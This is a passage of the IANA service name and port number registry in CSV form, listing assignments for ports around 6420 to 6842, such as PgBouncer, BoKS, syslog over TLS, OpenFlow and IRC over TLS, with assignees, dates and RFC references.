nim-vdrshell,6420,tcp,NIM_VDRShell,[Rik_Ditter],[Rik_Ditter],2006-02,,,,, nim-vdrshell,6420,udp,NIM_VDRShell,[Rik_Ditter],[Rik_Ditter],2006-02,,,,, nim-wan,6421,tcp,NIM_WAN,[Rik_Ditter],[Rik_Ditter],2006-02,,,,, nim-wan,6421,udp,NIM_WAN,[Rik_Ditter],[Rik_Ditter],2006-02,,,,, ,6422-6431,,Unassigned,,,,,,,, pgbouncer,6432,tcp,PgBouncer,[Marko_Kreen],[Marko_Kreen],2009-02-13,,,,, ,6432,udp,Reserved,,,,,,,, ,6433-6441,,Unassigned,,,,,,,, tarp,6442,tcp,Transitory Application Request Protocol,[Chris_Peel_2],[Chris_Peel_2],2014-05-16,,,,, ,6442,udp,Reserved,,,,,,,, sun-sr-https,6443,tcp,Service Registry Default HTTPS Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-https,6443,udp,Service Registry Default HTTPS Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sge-qmaster,6444,tcp,"Grid Engine Qmaster Service IANA assigned this well-formed service name as a replacement for ""sge_qmaster"".",[Andreas_Haas],[Andreas_Haas],2006-08,,,,, sge_qmaster,6444,tcp,Grid Engine Qmaster Service,[Andreas_Haas],[Andreas_Haas],2006-08,,,,,"This entry is an alias to ""sge-qmaster"". This entry is now historic, not usable for use with many common service discovery mechanisms." sge-qmaster,6444,udp,"Grid Engine Qmaster Service IANA assigned this well-formed service name as a replacement for ""sge_qmaster"".",[Andreas_Haas],[Andreas_Haas],2006-08,,,,, sge_qmaster,6444,udp,Grid Engine Qmaster Service,[Andreas_Haas],[Andreas_Haas],2006-08,,,,,"This entry is an alias to ""sge-qmaster"". This entry is now historic, not usable for use with many common service discovery mechanisms." sge-execd,6445,tcp,"Grid Engine Execution Service IANA assigned this well-formed service name as a replacement for ""sge_execd"".",[Andreas_Haas],[Andreas_Haas],2006-08,,,,, sge_execd,6445,tcp,Grid Engine Execution Service,[Andreas_Haas],[Andreas_Haas],2006-08,,,,,"This entry is an alias to ""sge-execd"". This entry is now historic, not usable for use with many common service discovery mechanisms." sge-execd,6445,udp,"Grid Engine Execution Service IANA assigned this well-formed service name as a replacement for ""sge_execd"".",[Andreas_Haas],[Andreas_Haas],2006-08,,,,, sge_execd,6445,udp,Grid Engine Execution Service,[Andreas_Haas],[Andreas_Haas],2006-08,,,,,"This entry is an alias to ""sge-execd"". This entry is now historic, not usable for use with many common service discovery mechanisms." mysql-proxy,6446,tcp,MySQL Proxy,[Kay_Roepke],[Kay_Roepke],2009-04-22,,,,, mysql-proxy,6446,udp,MySQL Proxy,[Kay_Roepke],[Kay_Roepke],2009-04-22,,,,, ,6447-6454,,Unassigned,,,,,,,, skip-cert-recv,6455,tcp,SKIP Certificate Receive,[Tom_Markson],[Tom_Markson],,,,,, skip-cert-recv,6455,udp,SKIP Certificate Receive,[Tom_Markson],[Tom_Markson],,,,,, skip-cert-send,6456,tcp,SKIP Certificate Send,[Tom_Markson],[Tom_Markson],,,,,, skip-cert-send,6456,udp,SKIP Certificate Send,[Tom_Markson],[Tom_Markson],,,,,, ,6457-6470,,Unassigned,,,,,,,, lvision-lm,6471,tcp,LVision License Manager,[Brian_McKinnon],[Brian_McKinnon],,,,,, lvision-lm,6471,udp,LVision License Manager,[Brian_McKinnon],[Brian_McKinnon],,,,,, ,6472-6479,,Unassigned,,,,,,,, sun-sr-http,6480,tcp,Service Registry Default HTTP Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-http,6480,udp,Service Registry Default HTTP Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, servicetags,6481,tcp,Service Tags,[Peter_Schow],[Peter_Schow],2007-01,,,,, servicetags,6481,udp,Service Tags,[Peter_Schow],[Peter_Schow],2007-01,,,,, ldoms-mgmt,6482,tcp,Logical Domains Management Interface,[Eric_Sharakan],[Eric_Sharakan],2008-02-14,,,,, ldoms-mgmt,6482,udp,Logical Domains Management Interface,[Eric_Sharakan],[Eric_Sharakan],2008-02-14,,,,, SunVTS-RMI,6483,tcp,SunVTS RMI,[Sumit_Arora],[Sumit_Arora],2007-06,,,,, SunVTS-RMI,6483,udp,SunVTS RMI,[Sumit_Arora],[Sumit_Arora],2007-06,,,,, sun-sr-jms,6484,tcp,Service Registry Default JMS Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-jms,6484,udp,Service Registry Default JMS Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-iiop,6485,tcp,Service Registry Default IIOP Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-iiop,6485,udp,Service Registry Default IIOP Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-iiops,6486,tcp,Service Registry Default IIOPS Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-iiops,6486,udp,Service Registry Default IIOPS Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-iiop-aut,6487,tcp,Service Registry Default IIOPAuth Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-iiop-aut,6487,udp,Service Registry Default IIOPAuth Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-jmx,6488,tcp,Service Registry Default JMX Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-jmx,6488,udp,Service Registry Default JMX Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-admin,6489,tcp,Service Registry Default Admin Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, sun-sr-admin,6489,udp,Service Registry Default Admin Domain,[Paul_Sterk],[Paul_Sterk],2006-03,,,,, ,6490-6499,,Unassigned,,,,,,,, boks,6500,tcp,BoKS Master,[Magnus_Nystrom],[Magnus_Nystrom],,,,,, boks,6500,udp,BoKS Master,[Magnus_Nystrom],[Magnus_Nystrom],,,,,, boks-servc,6501,tcp,"BoKS Servc IANA assigned this well-formed service name as a replacement for ""boks_servc"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,Known Unauthorized Use on port 6501, boks_servc,6501,tcp,BoKS Servc,[Magnus_Nystrom],[Magnus_Nystrom],,,,,Known Unauthorized Use on port 6501,"This entry is an alias to ""boks-servc"". This entry is now historic, not usable for use with many common service discovery mechanisms." boks-servc,6501,udp,"BoKS Servc IANA assigned this well-formed service name as a replacement for ""boks_servc"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, boks_servc,6501,udp,BoKS Servc,[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""boks-servc"". This entry is now historic, not usable for use with many common service discovery mechanisms." boks-servm,6502,tcp,"BoKS Servm IANA assigned this well-formed service name as a replacement for ""boks_servm"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, boks_servm,6502,tcp,BoKS Servm,[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""boks-servm"". This entry is now historic, not usable for use with many common service discovery mechanisms." boks-servm,6502,udp,"BoKS Servm IANA assigned this well-formed service name as a replacement for ""boks_servm"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, boks_servm,6502,udp,BoKS Servm,[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""boks-servm"". This entry is now historic, not usable for use with many common service discovery mechanisms." boks-clntd,6503,tcp,"BoKS Clntd IANA assigned this well-formed service name as a replacement for ""boks_clntd"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, boks_clntd,6503,tcp,BoKS Clntd,[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""boks-clntd"". This entry is now historic, not usable for use with many common service discovery mechanisms." boks-clntd,6503,udp,"BoKS Clntd IANA assigned this well-formed service name as a replacement for ""boks_clntd"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, boks_clntd,6503,udp,BoKS Clntd,[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""boks-clntd"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,6504,,Unassigned,,,,,,,, badm-priv,6505,tcp,"BoKS Admin Private Port IANA assigned this well-formed service name as a replacement for ""badm_priv"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, badm_priv,6505,tcp,BoKS Admin Private Port,[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""badm-priv"". This entry is now historic, not usable for use with many common service discovery mechanisms." badm-priv,6505,udp,"BoKS Admin Private Port IANA assigned this well-formed service name as a replacement for ""badm_priv"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, badm_priv,6505,udp,BoKS Admin Private Port,[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""badm-priv"". This entry is now historic, not usable for use with many common service discovery mechanisms." badm-pub,6506,tcp,"BoKS Admin Public Port IANA assigned this well-formed service name as a replacement for ""badm_pub"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, badm_pub,6506,tcp,BoKS Admin Public Port,[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""badm-pub"". This entry is now historic, not usable for use with many common service discovery mechanisms." badm-pub,6506,udp,"BoKS Admin Public Port IANA assigned this well-formed service name as a replacement for ""badm_pub"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, badm_pub,6506,udp,BoKS Admin Public Port,[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""badm-pub"". This entry is now historic, not usable for use with many common service discovery mechanisms." bdir-priv,6507,tcp,"BoKS Dir Server, Private Port IANA assigned this well-formed service name as a replacement for ""bdir_priv"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, bdir_priv,6507,tcp,"BoKS Dir Server, Private Port",[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""bdir-priv"". This entry is now historic, not usable for use with many common service discovery mechanisms." bdir-priv,6507,udp,"BoKS Dir Server, Private Port IANA assigned this well-formed service name as a replacement for ""bdir_priv"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, bdir_priv,6507,udp,"BoKS Dir Server, Private Port",[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""bdir-priv"". This entry is now historic, not usable for use with many common service discovery mechanisms." bdir-pub,6508,tcp,"BoKS Dir Server, Public Port IANA assigned this well-formed service name as a replacement for ""bdir_pub"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, bdir_pub,6508,tcp,"BoKS Dir Server, Public Port",[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""bdir-pub"". This entry is now historic, not usable for use with many common service discovery mechanisms." bdir-pub,6508,udp,"BoKS Dir Server, Public Port IANA assigned this well-formed service name as a replacement for ""bdir_pub"".",[Magnus_Nystrom],[Magnus_Nystrom],,,,,, bdir_pub,6508,udp,"BoKS Dir Server, Public Port",[Magnus_Nystrom],[Magnus_Nystrom],,,,,,"This entry is an alias to ""bdir-pub"". This entry is now historic, not usable for use with many common service discovery mechanisms." mgcs-mfp-port,6509,tcp,MGCS-MFP Port,[Minoru_Ozaki],[Minoru_Ozaki],,,,,, mgcs-mfp-port,6509,udp,MGCS-MFP Port,[Minoru_Ozaki],[Minoru_Ozaki],,,,,, mcer-port,6510,tcp,MCER Port,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, mcer-port,6510,udp,MCER Port,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, ,6511,tcp,Reserved,,,,,,,, dccp-udp,6511,udp,Datagram Congestion Control Protocol Encapsulation for NAT Traversal,[IESG],[IETF_Chair],,,[RFC6773],,, ,6512-6512,,Unassigned,,,,,,,, netconf-tls,6513,tcp,NETCONF over TLS,,,,,[RFC5539],,, ,6513,udp,Reserved,,,,,,,, syslog-tls,6514,tcp,Syslog over TLS,,,,,[RFC5425],,, syslog-tls,6514,udp,syslog over DTLS,,,,,[RFC6012],,, syslog-tls,6514,dccp,syslog over DTLS,,,,,[RFC6012],,, elipse-rec,6515,tcp,Elipse RPC Protocol,[F_Englert],[F_Englert],2007-09-17,,,,, elipse-rec,6515,udp,Elipse RPC Protocol,[F_Englert],[F_Englert],2007-09-17,,,,, ,6516-6542,,Unassigned,,,,,,,, lds-distrib,6543,tcp,lds_distrib,[Jack_Baker],[Jack_Baker],2003-06,,,,, lds-distrib,6543,udp,lds_distrib,[Jack_Baker],[Jack_Baker],2003-06,,,,, lds-dump,6544,tcp,LDS Dump Service,[Jack_Baker],[Jack_Baker],2006-02,,,,, lds-dump,6544,udp,LDS Dump Service,[Jack_Baker],[Jack_Baker],2006-02,,,,, ,6545-6546,,Unassigned,,,,,,,, apc-6547,6547,tcp,APC 6547,[American_Power_Conve],[American_Power_Conve],,,,,, apc-6547,6547,udp,APC 6547,[American_Power_Conve],[American_Power_Conve],,,,,, apc-6548,6548,tcp,APC 6548,[American_Power_Conve],[American_Power_Conve],,,,,, apc-6548,6548,udp,APC 6548,[American_Power_Conve],[American_Power_Conve],,,,,, apc-6549,6549,tcp,APC 6549,[American_Power_Conve],[American_Power_Conve],,,,,, apc-6549,6549,udp,APC 6549,[American_Power_Conve],[American_Power_Conve],,,,,, fg-sysupdate,6550,tcp,fg-sysupdate,[Mark_Beyer],[Mark_Beyer],,,,,, fg-sysupdate,6550,udp,fg-sysupdate,[Mark_Beyer],[Mark_Beyer],,,,,, sum,6551,tcp,Software Update Manager,[Jan_Dirven],[Jan_Dirven],2007-12-13,,,,, sum,6551,udp,Software Update Manager,[Jan_Dirven],[Jan_Dirven],2007-12-13,,,,, ,6552-6557,,Unassigned,,,,,,,, xdsxdm,6558,tcp,,[Brian_Tackett],[Brian_Tackett],,,,,,possible contact xdsxdm,6558,udp,,[Brian_Tackett],[Brian_Tackett],,,,,,possible contact ,6559-6565,,Unassigned,,,,,,,, sane-port,6566,tcp,SANE Control Port,[Henning_Meier_Geinit],[Henning_Meier_Geinit],2002-10,,,,, sane-port,6566,udp,SANE Control Port,[Henning_Meier_Geinit],[Henning_Meier_Geinit],2002-10,,,,, ,6567,,Reserved,,,2007-01,2011-08-26,,,,This entry has been removed on 2011-08-26. canit-store,6568,tcp,"CanIt Storage Manager IANA assigned this well-formed service name as a replacement for ""canit_store"".",[David_F_Skoll],[David_F_Skoll],2009-04-22,,,,, canit_store,6568,tcp,CanIt Storage Manager,[David_F_Skoll],[David_F_Skoll],2009-04-22,,,,,"This entry is an alias to ""canit-store"". This entry is now historic, not usable for use with many common service discovery mechanisms." rp-reputation,6568,udp,Roaring Penguin IP Address Reputation Collection,[David_F_Skoll],[David_F_Skoll],2010-02-05,,,,, ,6569-6578,,Unassigned,,,,,,,, affiliate,6579,tcp,Affiliate,[David_Catmull],[David_Catmull],2006-01,,,,, affiliate,6579,udp,Affiliate,[David_Catmull],[David_Catmull],2006-01,,,,, parsec-master,6580,tcp,Parsec Masterserver,[Andreas_Varga],[Andreas_Varga],,,,,, parsec-master,6580,udp,Parsec Masterserver,[Andreas_Varga],[Andreas_Varga],,,,,, parsec-peer,6581,tcp,Parsec Peer-to-Peer,[Andreas_Varga],[Andreas_Varga],,,,,, parsec-peer,6581,udp,Parsec Peer-to-Peer,[Andreas_Varga],[Andreas_Varga],,,,,, parsec-game,6582,tcp,Parsec Gameserver,[Andreas_Varga],[Andreas_Varga],,,,,, parsec-game,6582,udp,Parsec Gameserver,[Andreas_Varga],[Andreas_Varga],,,,,, joaJewelSuite,6583,tcp,JOA Jewel Suite,[Bob_Rundle],[Bob_Rundle],2005-11,,,,, joaJewelSuite,6583,udp,JOA Jewel Suite,[Bob_Rundle],[Bob_Rundle],2005-11,,,,, ,6584-6587,,Unassigned,,,,,,,, ,6588,,Unassigned,,,,,,,Unofficial use of port 6588 by AnalogX and Microsoft, ,6589-6599,,Unassigned,,,,,,,, mshvlm,6600,tcp,Microsoft Hyper-V Live Migration,[Rajesh_D],[Rajesh_D],2009-02-03,,,,, ,6600,udp,Reserved,,,,,,,, mstmg-sstp,6601,tcp,Microsoft Threat Management Gateway SSTP,[Ori_Yosefi],[Ori_Yosefi],2009-05-04,,,,, ,6601,udp,Reserved,,,,,,,, wsscomfrmwk,6602,tcp,Windows WSS Communication Framework,[Rong_Yu],[Rong_Yu],2010-08-10,,,,, ,6602,udp,Reserved,,,,,,,, ,6603-6618,,Unassigned,,,,,,,, odette-ftps,6619,tcp,ODETTE-FTP over TLS/SSL,[Ieuan_Friend],[Ieuan_Friend],2006-03,,[RFC5024],,, odette-ftps,6619,udp,ODETTE-FTP over TLS/SSL,[Ieuan_Friend],[Ieuan_Friend],2006-03,,[RFC5024],,, kftp-data,6620,tcp,Kerberos V5 FTP Data,[Robert_J_Scott],[Robert_J_Scott],2005-08,,,,, kftp-data,6620,udp,Kerberos V5 FTP Data,[Robert_J_Scott],[Robert_J_Scott],2005-08,,,,, kftp,6621,tcp,Kerberos V5 FTP Control,[Robert_J_Scott],[Robert_J_Scott],2005-08,,,,, kftp,6621,udp,Kerberos V5 FTP Control,[Robert_J_Scott],[Robert_J_Scott],2005-08,,,,, mcftp,6622,tcp,Multicast FTP,[Bruce_Lueckenhoff_2],[Bruce_Lueckenhoff_2],2006-02,,,,, mcftp,6622,udp,Multicast FTP,[Bruce_Lueckenhoff_2],[Bruce_Lueckenhoff_2],2006-02,,,,, ktelnet,6623,tcp,Kerberos V5 Telnet,[Robert_J_Scott],[Robert_J_Scott],2005-08,,,,, ktelnet,6623,udp,Kerberos V5 Telnet,[Robert_J_Scott],[Robert_J_Scott],2005-08,,,,, datascaler-db,6624,tcp,DataScaler database,[Vasu_Murthy],[Vasu_Murthy],2010-02-08,,,,, ,6624,udp,Reserved,,,,,,,, datascaler-ctl,6625,tcp,DataScaler control,[Vasu_Murthy],[Vasu_Murthy],2010-02-08,,,,, ,6625,udp,Reserved,,,,,,,, wago-service,6626,tcp,WAGO Service and Update,[Wolfgang_Adler],[Wolfgang_Adler],2006-04,,,,, wago-service,6626,udp,WAGO Service and Update,[Wolfgang_Adler],[Wolfgang_Adler],2006-04,,,,, nexgen,6627,tcp,Allied Electronics NeXGen,[Lou_Seitchik],[Lou_Seitchik],2005-08,,,,, nexgen,6627,udp,Allied Electronics NeXGen,[Lou_Seitchik],[Lou_Seitchik],2005-08,,,,, afesc-mc,6628,tcp,AFE Stock Channel M/C,[K_K_Ho],[K_K_Ho],2004-04,,,,, afesc-mc,6628,udp,AFE Stock Channel M/C,[K_K_Ho],[K_K_Ho],2004-04,,,,, ,6629-6630,,Unassigned,,,,,,,, ,6631,,Unassigned,,,2004-05-28,,,,, mxodbc-connect,6632,tcp,eGenix mxODBC Connect,[Marc_Andre_Lemburg],[Marc_Andre_Lemburg],2009-11-13,,,,Unauthorized Use Known on port 6632, ,6632,udp,Reserved,,,,,,,, ,6633,tcp,Reserved,,,,,,,, cisco-vpath-tun,6633,udp,Cisco vPath Services Overlay,[Cisco2],[Surendra_Kumar],2012-06-11,,,,, mpls-pm,6634,udp,MPLS Performance Measurement out-of-band response,[Cisco_Systems_2],[Sagar_Soni],2014-02-20,,,,, ,6634,tcp,Reserved,,,,,,,, ,6635-6639,,Unassigned,,,,,,,, ovsdb,6640,tcp,Open vSwitch Database protocol,[Bruce_Davie_2],[Bruce_Davie_2],2013-07-31,,[RFC7047],,, ,6640,udp,Reserved,,,,,,,, ,6641-6652,,Unassigned,,,,,,,, openflow,6653,tcp,OpenFlow,[Open_Networking_Foundation],[Puneet_Agarwal],2013-07-18,,,,, openflow,6653,udp,OpenFlow,[Open_Networking_Foundation],[Puneet_Agarwal],2013-07-18,,,,, ,6654,,Unassigned,,,,,,,, pcs-sf-ui-man,6655,tcp,PC SOFT - Software factory UI/manager,[Jerome_AERTS],[Jerome_AERTS],2010-11-30,,,,, ,6655,udp,Reserved,,,,,,,, emgmsg,6656,tcp,Emergency Message Control Service,[Gerry_Gorman],[Gerry_Gorman],2010-12-06,,,,, ,6656,udp,Reserved,,,,,,,, ,6657,tcp,Reserved,,,,,,,, palcom-disc,6657,udp,PalCom Discovery,[Boris_Magnusson],[Boris_Magnusson],2010-12-06,,,,, ,6658-6664,,Unassigned,,,,,,,Unauthorized Use Known on Port 6659, ircu,6665-6669,tcp,IRCU,[Brian_Tackett],[Brian_Tackett],,,,,, ,6665-6669,udp,Reserved,,,,,,,, vocaltec-gold,6670,tcp,Vocaltec Global Online Directory,[Scott_Petrack],[Scott_Petrack],,,,,, vocaltec-gold,6670,udp,Vocaltec Global Online Directory,[Scott_Petrack],[Scott_Petrack],,,,,, p4p-portal,6671,tcp,P4P Portal Service,[Chris_Griffiths],[Chris_Griffiths],2008-07-28,,,,, p4p-portal,6671,udp,P4P Portal Service,[Chris_Griffiths],[Chris_Griffiths],2008-07-28,,,,, vision-server,6672,tcp,"vision_server IANA assigned this well-formed service name as a replacement for ""vision_server"".",[Chris_Kramer],[Chris_Kramer],,,,,, vision_server,6672,tcp,vision_server,[Chris_Kramer],[Chris_Kramer],,,,,,"This entry is an alias to ""vision-server"". This entry is now historic, not usable for use with many common service discovery mechanisms." vision-server,6672,udp,"vision_server IANA assigned this well-formed service name as a replacement for ""vision_server"".",[Chris_Kramer],[Chris_Kramer],,,,,, vision_server,6672,udp,vision_server,[Chris_Kramer],[Chris_Kramer],,,,,,"This entry is an alias to ""vision-server"". This entry is now historic, not usable for use with many common service discovery mechanisms." vision-elmd,6673,tcp,"vision_elmd IANA assigned this well-formed service name as a replacement for ""vision_elmd"".",[Chris_Kramer],[Chris_Kramer],,,,,, vision_elmd,6673,tcp,vision_elmd,[Chris_Kramer],[Chris_Kramer],,,,,,"This entry is an alias to ""vision-elmd"". This entry is now historic, not usable for use with many common service discovery mechanisms." vision-elmd,6673,udp,"vision_elmd IANA assigned this well-formed service name as a replacement for ""vision_elmd"".",[Chris_Kramer],[Chris_Kramer],,,,,, vision_elmd,6673,udp,vision_elmd,[Chris_Kramer],[Chris_Kramer],,,,,,"This entry is an alias to ""vision-elmd"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,6674-6677,,Unassigned,,,,,,,, vfbp,6678,tcp,Viscount Freedom Bridge Protocol,[Chris_MacDonald],[Chris_MacDonald],2011-03-16,,,,, vfbp-disc,6678,udp,Viscount Freedom Bridge Discovery,[Chris_MacDonald],[Chris_MacDonald],2011-03-16,,,,, osaut,6679,tcp,Osorno Automation,[Peter_Hombach],[Peter_Hombach],2011-03-16,,,,, osaut,6679,udp,Osorno Automation,[Peter_Hombach],[Peter_Hombach],2011-03-16,,,,, ,6680-6686,,Unassigned,,,,,,,, clever-ctrace,6687,tcp,CleverView for cTrace Message Service,[David_Cheng],[David_Cheng],2010-02-01,,,,, ,6687,udp,Reserved,,,,,,,, clever-tcpip,6688,tcp,CleverView for TCP/IP Message Service,[David_Cheng],[David_Cheng],2009-10-13,,,,, ,6688,udp,Reserved,,,,,,,, tsa,6689,tcp,Tofino Security Appliance,[Scott_Howard],[Scott_Howard],2009-10-13,,,,, tsa,6689,udp,Tofino Security Appliance,[Scott_Howard],[Scott_Howard],2009-10-13,,,,, ,6690-6695,,Unassigned,,,,,,,, ,6696,tcp,Reserved,,,,,,,, babel,6696,udp,Babel Routing Protocol,,,,2011-08-15,[RFC6126],,, ircs-u,6697,tcp,Internet Relay Chat via TLS/SSL,,,2014-02-11,,[RFC-hartmann-default-port-for-irc-via-tls-ssl-09],,, ,6697,udp,Reserved,,,2014-02-11,,,,, ,6698-6699,,Unassigned,,,,,,,, ,6700,,Unassigned,,,2010-01-26,,,,, kti-icad-srvr,6701,tcp,KTI/ICAD Nameserver,[Stanley_Knutson],[Stanley_Knutson],,,,,, kti-icad-srvr,6701,udp,KTI/ICAD Nameserver,[Stanley_Knutson],[Stanley_Knutson],,,,,, ,6701,sctp,Unassigned,,,,2010-01-26,,,, e-design-net,6702,tcp,e-Design network,[Janos_Lerch],[Janos_Lerch],2006-02,,,,, e-design-net,6702,udp,e-Design network,[Janos_Lerch],[Janos_Lerch],2006-02,,,,, ,6702,sctp,Unassigned,,,,2010-01-26,,,, e-design-web,6703,tcp,e-Design web,[Janos_Lerch],[Janos_Lerch],2006-02,,,,, e-design-web,6703,udp,e-Design web,[Janos_Lerch],[Janos_Lerch],2006-02,,,,, ,6704,udp,Reserved,,,,,,,, ,6704,tcp,Reserved,,,,,,,, frc-hp,6704,sctp,ForCES HP (High Priority) channel,,,,,[RFC5811],,, ,6705,udp,Reserved,,,,,,,, ,6705,tcp,Reserved,,,,,,,, frc-mp,6705,sctp,ForCES MP (Medium Priority) channel,,,,,[RFC5811],,, ,6706,udp,Reserved,,,,,,,, ,6706,tcp,Reserved,,,,,,,, frc-lp,6706,sctp,ForCES LP (Low priority) channel,,,,,[RFC5811],,, ,6707-6713,,Unassigned,,,,,,,, ibprotocol,6714,tcp,Internet Backplane Protocol,[Alessandro_Bassi],[Alessandro_Bassi],,,,,, ibprotocol,6714,udp,Internet Backplane Protocol,[Alessandro_Bassi],[Alessandro_Bassi],,,,,, fibotrader-com,6715,tcp,Fibotrader Communications,[Robert_Wetzold],[Robert_Wetzold],2006-01,,,,, fibotrader-com,6715,udp,Fibotrader Communications,[Robert_Wetzold],[Robert_Wetzold],2006-01,,,,, printercare-cc,6716,tcp,PrinterCare cloud service,[E-FISH_sp._z.o.o.],[Tomasz_Krakowiak],2014-07-07,,,,, ,6716,udp,Reserved,,,,,,,, ,6717-6766,,Unassigned,,,,,,,, bmc-perf-agent,6767,tcp,BMC PERFORM AGENT,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-perf-agent,6767,udp,BMC PERFORM AGENT,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-perf-mgrd,6768,tcp,BMC PERFORM MGRD,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-perf-mgrd,6768,udp,BMC PERFORM MGRD,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, adi-gxp-srvprt,6769,tcp,ADInstruments GxP Server,[Mathew_Pitchforth],[Mathew_Pitchforth],2005-08,,,,, adi-gxp-srvprt,6769,udp,ADInstruments GxP Server,[Mathew_Pitchforth],[Mathew_Pitchforth],2005-08,,,,, plysrv-http,6770,tcp,PolyServe http,[Mike_Spitzer],[Mike_Spitzer],2005-08,,,,, plysrv-http,6770,udp,PolyServe http,[Mike_Spitzer],[Mike_Spitzer],2005-08,,,,, plysrv-https,6771,tcp,PolyServe https,[Mike_Spitzer],[Mike_Spitzer],2005-08,,,,, plysrv-https,6771,udp,PolyServe https,[Mike_Spitzer],[Mike_Spitzer],2005-08,,,,, ,6772-6776,,Unassigned,,,,,,,, ntz-tracker,6777,tcp,netTsunami Tracker,[Tomahawk_Holdings],[Sagara_Wijetunga],2013-05-01,,,,, ,6777,udp,Reserved,,,,,,,, ntz-p2p-storage,6778,tcp,netTsunami p2p storage system,[Tomahawk_Holdings],[Sagara_Wijetunga],2013-05-01,,,,, ,6778,udp,Reserved,,,,,,,, ,6779-6783,,Unassigned,,,,,,,, ,6784,tcp,Reserved,,,,,,,, bfd-lag,6784,udp,Bidirectional Forwarding Detection (BFD) on Link Aggregation Group (LAG) Interfaces,[IESG],[BFD_Chairs],2012-11-08,2014-01-09,[RFC7130],,, dgpf-exchg,6785,tcp,DGPF Individual Exchange,[Thomas_Weise],[Thomas_Weise],2006-04,,,,, dgpf-exchg,6785,udp,DGPF Individual Exchange,[Thomas_Weise],[Thomas_Weise],2006-04,,,,, smc-jmx,6786,tcp,Sun Java Web Console JMX,[Bill_Edwards],[Bill_Edwards],2005-08,,,,, smc-jmx,6786,udp,Sun Java Web Console JMX,[Bill_Edwards],[Bill_Edwards],2005-08,,,,, smc-admin,6787,tcp,Sun Web Console Admin,[Bill_Edwards],[Bill_Edwards],2005-08,,,,, smc-admin,6787,udp,Sun Web Console Admin,[Bill_Edwards],[Bill_Edwards],2005-08,,,,, smc-http,6788,tcp,SMC-HTTP,[Ratnadeep_Bhattachar],[Ratnadeep_Bhattachar],2002-11,,,,, smc-http,6788,udp,SMC-HTTP,[Ratnadeep_Bhattachar],[Ratnadeep_Bhattachar],2002-11,,,,, smc-https,6789,tcp,SMC-HTTPS,[Ratnadeep_Bhattachar],[Ratnadeep_Bhattachar],2002-08,,,,, smc-https,6789,udp,SMC-HTTPS,[Ratnadeep_Bhattachar],[Ratnadeep_Bhattachar],2002-08,,,,, hnmp,6790,tcp,HNMP,[Jude_George],[Jude_George],,,,,, hnmp,6790,udp,HNMP,[Jude_George],[Jude_George],,,,,, hnm,6791,tcp,Halcyon Network Manager,[Richard_Harriss],[Richard_Harriss],2005-05,,,,, hnm,6791,udp,Halcyon Network Manager,[Richard_Harriss],[Richard_Harriss],2005-05,,,,, ,6792-6800,,Unassigned,,,,,,,, acnet,6801,tcp,ACNET Control System Protocol,[Rich_Neswold],[Rich_Neswold],2007-02,,,,, acnet,6801,udp,ACNET Control System Protocol,[Rich_Neswold],[Rich_Neswold],2007-02,,,,, ,6802-6816,,Unassigned,,,,,,,, pentbox-sim,6817,tcp,PenTBox Secure IM Protocol,[Alberto_Ortega_Llama],[Alberto_Ortega_Llama],2009-11-04,,,,, ,6817,udp,Reserved,,,,,,,, ,6818-6830,,Unassigned,,,,,,,, ambit-lm,6831,tcp,ambit-lm,[Don_Hejna],[Don_Hejna],,,,,, ambit-lm,6831,udp,ambit-lm,[Don_Hejna],[Don_Hejna],,,,,, ,6832-6840,,Unassigned,,,,,,,, netmo-default,6841,tcp,Netmo Default,[Urs_Bertschinger],[Urs_Bertschinger],,,,,, netmo-default,6841,udp,Netmo Default,[Urs_Bertschinger],[Urs_Bertschinger],,,,,, netmo-http,6842,tcp,Netmo 